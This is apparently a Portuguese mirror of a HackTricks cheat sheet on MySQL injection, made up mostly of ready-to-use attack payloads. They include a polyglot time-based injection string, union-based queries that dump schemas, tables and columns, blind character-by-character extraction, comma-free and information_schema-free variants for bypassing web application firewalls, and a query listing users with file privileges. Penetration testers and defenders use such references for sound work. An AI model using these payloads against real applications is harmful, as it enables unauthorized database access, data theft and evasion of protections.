mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-20 18:14:15 +00:00
200 lines
11 KiB
Markdown
200 lines
11 KiB
Markdown
# Injeção MySQL
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||
|
||
</details>
|
||
|
||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||
|
||
[**RootedCON**](https://www.rootedcon.com/) é o evento de cibersegurança mais relevante na **Espanha** e um dos mais importantes na **Europa**. Com **a missão de promover o conhecimento técnico**, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.
|
||
|
||
{% embed url="https://www.rootedcon.com/" %}
|
||
|
||
## Comentários
|
||
```sql
|
||
-- MYSQL Comment
|
||
# MYSQL Comment
|
||
/* MYSQL Comment */
|
||
/*! MYSQL Special SQL */
|
||
/*!32302 10*/ Comment for MySQL version 3.23.02
|
||
```
|
||
## Funções Interessantes
|
||
|
||
### Confirmar Mysql:
|
||
```
|
||
concat('a','b')
|
||
database()
|
||
version()
|
||
user()
|
||
system_user()
|
||
@@version
|
||
@@datadir
|
||
rand()
|
||
floor(2.9)
|
||
length(1)
|
||
count(1)
|
||
```
|
||
### Funções úteis
|
||
```sql
|
||
SELECT hex(database())
|
||
SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
|
||
SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')# Encode() & decpde() returns only numbers
|
||
SELECT uncompress(compress(database())) #Compress & uncompress() returns only numbers
|
||
SELECT replace(database(),"r","R")
|
||
SELECT substr(database(),1,1)='r'
|
||
SELECT substring(database(),1,1)=0x72
|
||
SELECT ascii(substring(database(),1,1))=114
|
||
SELECT database()=char(114,101,120,116,101,115,116,101,114)
|
||
SELECT group_concat(<COLUMN>) FROM <TABLE>
|
||
SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
|
||
SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
|
||
strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()
|
||
```
|
||
## Todas as injeções
|
||
```sql
|
||
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
|
||
```
|
||
de [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
|
||
|
||
## Fluxo
|
||
|
||
Lembre-se de que em versões "modernas" do **MySQL**, você pode substituir "_**information\_schema.tables**_" por "_**mysql.innodb\_table\_stats**_**"** (Isso pode ser útil para contornar WAFs).
|
||
```sql
|
||
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
|
||
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
|
||
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
|
||
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
|
||
```
|
||
### **Apenas 1 valor**
|
||
|
||
* `group_concat()`
|
||
* `Limit X,1`
|
||
|
||
### **Cego um por um**
|
||
|
||
* `substr(version(),X,1)='r'` ou `substring(version(),X,1)=0x70` ou `ascii(substr(version(),X,1))=112`
|
||
* `mid(version(),X,1)='5'`
|
||
|
||
### **Adição cega**
|
||
|
||
* `LPAD(version(),1...lenght(version()),'1')='asd'...`
|
||
* `RPAD(version(),1...lenght(version()),'1')='asd'...`
|
||
* `SELECT RIGHT(version(),1...lenght(version()))='asd'...`
|
||
* `SELECT LEFT(version(),1...lenght(version()))='asd'...`
|
||
* `SELECT INSTR('foobarbar', 'fo...')=1`
|
||
|
||
## Detectar número de colunas
|
||
|
||
Usando um simples ORDER
|
||
```
|
||
order by 1
|
||
order by 2
|
||
order by 3
|
||
...
|
||
order by XXX
|
||
|
||
UniOn SeLect 1
|
||
UniOn SeLect 1,2
|
||
UniOn SeLect 1,2,3
|
||
...
|
||
```
|
||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||
|
||
[**RootedCON**](https://www.rootedcon.com/) é o evento de cibersegurança mais relevante na **Espanha** e um dos mais importantes na **Europa**. Com a missão de promover o conhecimento técnico, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.
|
||
|
||
{% embed url="https://www.rootedcon.com/" %}
|
||
|
||
## MySQL Baseado em Union
|
||
```sql
|
||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||
```
|
||
## SSRF
|
||
|
||
**Aprenda aqui diferentes opções para** [**abusar de uma injeção Mysql para obter um SSRF**](mysql-ssrf.md)**.**
|
||
|
||
## Truques de bypass de WAF
|
||
|
||
### Alternativas de information\_schema
|
||
|
||
Lembre-se de que em versões "modernas" do **MySQL** você pode substituir _**information\_schema.tables**_ por _**mysql.innodb\_table\_stats**_\*\* \*\* ou por _**sys.x$schema\_flattened\_keys**_ ou por **sys.schema\_table\_statistics**
|
||
|
||
![](<../../../.gitbook/assets/image (154).png>)
|
||
|
||
![](<../../../.gitbook/assets/image (155).png>)
|
||
|
||
### Injeção MySQL sem VÍRGULAS
|
||
|
||
Selecione 2 colunas sem usar nenhuma vírgula ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
|
||
```
|
||
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
|
||
```
|
||
### Recuperando valores sem o nome da coluna
|
||
|
||
Se em algum momento você souber o nome da tabela, mas não souber o nome das colunas dentro da tabela, você pode tentar descobrir quantas colunas existem executando algo como:
|
||
```bash
|
||
# When a True is returned, you have found the number of columns
|
||
select (select "", "") = (SELECT * from demo limit 1); # 2columns
|
||
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
|
||
```
|
||
Supondo que existam 2 colunas (sendo a primeira o ID) e a outra a flag, você pode tentar forçar a entrada do conteúdo da flag tentando caractere por caractere:
|
||
```bash
|
||
# When True, you found the correct char and can start ruteforcing the next position
|
||
select (select 1, 'flaf') = (SELECT * from demo limit 1);
|
||
```
|
||
Mais informações em [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
|
||
|
||
### História do MySQL
|
||
|
||
Você pode ver outras execuções dentro do MySQL lendo a tabela: **sys.x$statement\_analysis**
|
||
|
||
### Alternativas de versão
|
||
```
|
||
mysql> select @@innodb_version;
|
||
+------------------+
|
||
| @@innodb_version |
|
||
+------------------+
|
||
| 5.6.31 |
|
||
+------------------+
|
||
|
||
mysql> select @@version;
|
||
+-------------------------+
|
||
| @@version |
|
||
+-------------------------+
|
||
| 5.6.31-0ubuntu0.15.10.1 |
|
||
+-------------------------+
|
||
|
||
mysql> mysql> select version();
|
||
+-------------------------+
|
||
| version() |
|
||
+-------------------------+
|
||
| 5.6.31-0ubuntu0.15.10.1 |
|
||
+-------------------------+
|
||
```
|
||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||
|
||
[**RootedCON**](https://www.rootedcon.com/) é o evento de cibersegurança mais relevante na **Espanha** e um dos mais importantes na **Europa**. Com a missão de promover o conhecimento técnico, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.
|
||
|
||
{% embed url="https://www.rootedcon.com/" %}
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* Você trabalha em uma **empresa de cibersegurança**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||
|
||
</details>
|